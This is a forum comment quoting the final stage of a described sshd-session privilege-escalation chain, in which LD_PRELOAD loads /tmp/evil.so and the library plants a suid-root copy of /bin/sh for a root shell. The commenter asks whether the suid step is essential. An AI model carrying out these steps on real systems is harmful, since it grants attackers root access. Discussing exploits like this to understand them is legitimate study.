|
|
|
|
|
|
by rsync
34 days ago
|
|
|
I am reading: "When the timing aligns, the trigger's buggy memmove causes K+1 to self-overwrite, replacing sshd-session's real environment with the preseed payload. sshd-session's exec_copyout_strings copies LD_PRELOAD=/tmp/evil.so to the new process's stack, the runtime linker loads evil.so, and its constructor copies /bin/sh to /tmp/rootsh and sets it suid root. My human's unprivileged user runs /tmp/rootsh -p and gets a root shell." ... so at the very end of the exploit chain, is /tmp/rootsh required to be suid root before it is finally run to get the root shell ? ... or is the exploit already achieved and /tmp/rootsh is just an arbitrary indicator ? |
|
|